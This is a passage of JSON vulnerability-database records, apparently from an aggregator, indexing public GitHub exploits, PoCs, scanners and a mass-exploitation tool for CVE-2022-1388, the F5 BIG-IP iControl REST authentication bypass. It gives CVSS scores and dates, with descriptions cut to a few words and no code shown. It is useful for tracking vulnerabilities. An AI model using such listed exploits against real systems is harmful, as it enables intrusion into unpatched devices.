"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-06-15T20:04:22", "description": "# CVE-2022-1388\nBIG-IP iControl REST vulnerability CVE-2022-1388...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T10:35:35", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-15T19:59:21", "id": "1B780B5D-F60A-5066-A44B-253EADDAC5CF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-15T20:03:15", "description": "# CVE-2022-1388\n\n> CVE-2022-1388 F5 BIG-IP iControl REST Auth By...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T10:22:31", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-15T19:59:21", "id": "E7FB27A1-5ECC-5541-BE31-7ABC656DFACA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-20T14:02:21", "description": "# CVE-2022-1388\nCVE-2022-1388 Sca...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T19:33:37", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-20T13:27:59", "id": "D133D476-887B-53A8-A831-16AFB83B7038", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:14:29", "description": "# CVE2022-1388_TestAPI\nA Test API for testin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T15:34:14", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-26T21:22:13", "id": "0C3BF793-B508-5082-A673-3882A95A6EDF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-11T16:45:47", "description": "# CVE-2022-1388-PocExp\nCVE-2022-1388-PocExp,\u65b0\u589e\u4e86\u591a\u7ebf\u7a0b\n# Usg...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T15:44:50", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-11T08:36:43", "id": "28EB1599-0E12-5ECA-8368-08DD51291F7F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-16T05:17:47", "description": "# CVE-2022-1388 F5 BIG-IP RCE \u591a\u7ebf\u7a0b\u68c0\u6d4b\nuse\uff1a\n\n```\n\u5355\u4e2aurl:\npython3 CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T05:30:11", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-16T05:09:43", "id": "A160DC38-C6E4-5C85-9F98-4BC04D80FCD9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T15:50:10", "description": "# CVE-2022-1388-Exploit\nTest and Exploit Scripts for CVE 2022-13...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T15:16:12", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-14T13:15:36", "id": "1405211A-94E2-5ECA-BF96-441D2FF564CB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-23T20:07:29", "description": "# CVE-2022-1388\nPOC for CVE-2022-1388 affecting multiple F5 prod...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T11:46:45", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-23T19:08:19", "id": "1406F2B7-7907-5BCF-947E-0DB31B9F014C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-11T01:09:27", "description": "# CVE-2022-1388\nCVE-2022-1388 POC exploit\n\n# Usage\n```shell\nusag...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T15:42:55", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T21:07:51", "id": "07F0F779-CBA8-507A-8268-EFD213F50D06", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-13T22:09:58", "description": "# CVE-2022-1388\nCVE-2022-13...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T14:37:04", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T14:39:16", "id": "1E5E8601-B107-5E10-BB37-0A7C7BB2926D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-10T19:13:08", "description": "# CVE-2022-1388-EXP\nThis is CVE-2022-1388-EXP\nAuthor:Caps@BUGFOR...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T08:09:30", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T13:06:26", "id": "C39D4BF6-5B98-5653-AA56-8DC5F53FEDA7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-07T17:49:33", "description": "# CVE-2022-1388-POC\nBIG-IP iCONTROL REST API AUTH BYPASS /RCE EX...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T14:55:45", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-07T16:46:52", "id": "17B2C229-06F1-5A30-9E3A-ED9E23DA3F13", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-12T16:59:14", "description": "# cve-2022-1388-mass\nbig-ip icontrol rest auth bypass RCE MASS w...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T14:57:31", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-11T15:02:07", "id": "91380AB1-864A-5C58-B9BE-88541D8E0911", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-10T19:12:57", "description": "# CVE-2022-1388-RCE-chec...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T17:34:28", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T17:34:39", "id": "F7396B72-9692-5E12-8893-FFE6A091B496", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-10T19:12:59", "description": "# CVE-2022-1388\n\nF5 BIG-IP Unauthenticated RCE Vulnerability\n\nF5...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T15:24:27", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T16:10:58", "id": "4AA50D81-1CFC-5DDC-804E-F50243E3E9C7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-21T15:27:20", "description": "# CVE-2022-1388\nBIG-IP iControl REST vulnerability CVE-2022-1388...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T10:06:11", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-21T09:37:19", "id": "EC7A045E-54CB-5327-8755-53F82B91F56D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-10T19:13:04", "description": "# CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T04:51:06", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T05:01:29", "id": "1BF999D3-0E32-5C04-820B-BB91E950147C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-12T17:01:14", "description": "# CVE-2022-1388 RCE checker\n\nSimple bash script to check CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-08T09:28:19", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T12:40:23", "id": "1A3F2735-FB81-52A4-BF5F-FD8A728C3CA9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-09T16:09:05", "description": "# CVE-2022-1388 F5 BIG-IP RCE \u591a\u7ebf\u7a0b\u68c0\u6d4b\nuse\uff1a\n\n```\n\u5355\u4e2aurl:\npython3 CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T14:09:34", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T15:27:25", "id": "E479356B-3D07-5131-8A34-4C6FD67776AB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:03:44", "description": "# Exploit-F5-CVE-2022-1388\nPoC For F5 BIG-IP - bash script Explo...", "cvss3": {"exploitabilityScore": 3.9, 